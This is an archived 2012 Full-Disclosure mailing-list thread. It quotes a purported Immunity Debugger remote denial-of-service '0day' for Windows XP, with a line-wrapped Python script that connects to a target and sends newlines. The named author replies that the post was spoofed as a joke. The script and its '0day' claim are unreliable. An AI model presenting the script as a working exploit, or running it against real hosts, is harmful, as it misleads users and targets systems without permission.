lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAOKu0yB98KuNw7db6pDUNz0yXQJD8TthCi-wMsu7BPi3SGDncQ@mail.gmail.com>
Date: Tue, 17 Apr 2012 12:36:33 -0400
From: Terrence <secretpackets@...il.com>
To: adam@...osecinstitute.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP denial of service 0day found in
	CTF exercise

This is awesome!

Its almost as awesome as a privilege escalation from root to root that
works only in backtrack.

--
tuna
65617420646120706f6f20706f6f



On Tue, Apr 17, 2012 at 10:07,  <adam@...osecinstitute.com> wrote:
> Guys, this is a fake release, someone spoofed my email and sent this out
> as a joke to mock the wicd release from last week. Please note that if you
> click on the links, there is nothing there concerning this.
>
>
>
>
>>
>> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>>> Immunity Debugger Remote Denial of Service 0Day Tested against
>>> version 1.76 and 1.80 on Windows XP distributions
>>>
>>> Has not been tested for potential privilege escalation vectors.
>>>
>>> We first wrote about Immunity Debugger here:
>>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>>
>>>  Discovered by a student that wishes to remain anonymous in the
>>> course CTF. This 0day exploit for Windows was discovered by a
>>> student in the InfoSec Institute Ethical Hacking class, during an
>>> evening CTF exercise. The student wishes to remain anonymous, he
>>> has contributed a python version of the 0day. A patch that can be
>>> applied to Windows has not been made available. You can find a
>>> python version of the exploit to copy and paste here:
>>>
>>>
>>> #!/usr/bin/python #Windows XP denial of service 0day exploit
>>> discovered on 4.9.12 by InfoSec Institute student #For full write
>>> up and description go to
>>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>>
>>>
>> import sys
>>> import os import time import getopt import socket
>>>
>>> class Error(Exception): def __init__(self, error):
>>> self.errorStr=error  def __str__(self): return repr(self.errorStr)
>>>
>>> class Exploit():
>>>
>>> def __init__(self, targetHost, targetPort): self.targetHost =
>>> targetHost
>>>
>>> def exploit(self, targetHost, targetPort):
>>>
>>> try: socket.inet_aton(targetHost) s =
>>> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>>> s.connect((targetHost,targetPort)) except socket.error: raise
>>> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>>>
>>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
>>> except: raise Error("Unable to exploit (Exploit failed.)")
>>>
>>> def usage(): print "[!] Usage:" print "      ( -h, --help ):" print "
>>> Print this message." print " ( --targetHost= ): Target host." print
>>> "            --targetHost=127.0.0.1" print " ( --targetPort= ): Target
>>> port." print "               --targetPort=8888"
>>>
>>> def main(): print "[$] Windows XP 0Day" try: opts, args =
>>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
>>> "targetPort="]) except getopt.GetoptError, err: # Print help
>>> information and exit: print '[!] Parameter error:' + str(err) #
>>> Will print something like "option -a not recognized" usage()
>>> sys.exit(0)
>>>
>>> targetHost=None targetPort=None  for opt, arg in opts: if opt in
>>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
>>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
>>> would be assuming to say we'll never get here. print "[!] Parameter
>>> error." usage() sys.exit(0)  if not targetHost: print "[!]
>>> Parameter error: targetHost not set." usage() sys.exit(0)
>>>
>>> if not targetPort: print "[!] Parameter error: targetPort not
>>> set." usage() sys.exit(0)
>>>
>>> exploit = Exploit(targetHost, targetPort)
>>>
>>> print "[*] Attempting to exploit:"  try:
>>> exploit.exploit(targetHost, int(targetPort)) except Error as
>>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
>>> print "[*] Exploit appears to have worked."
>>>
>>> # Standard boilerplate to call the main() function to begin # the
>>> program. if __name__=='__main__': main()
>>>
>>>
>>>
>>> _______________________________________________ Full-Disclosure -
>>> We believe in it. Charter:
>>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>>> sponsored by Secunia - http://secunia.com/
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1.4.12 (GNU/Linux)
>> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>>
>> iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
>> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
>> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
>> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
>> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
>> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
>> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
>> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
>> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
>> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
>> 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
>> 4r6K58WTZ7qR2nTNKnQi
>> =Uoev
>> -----END PGP SIGNATURE-----
>>
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ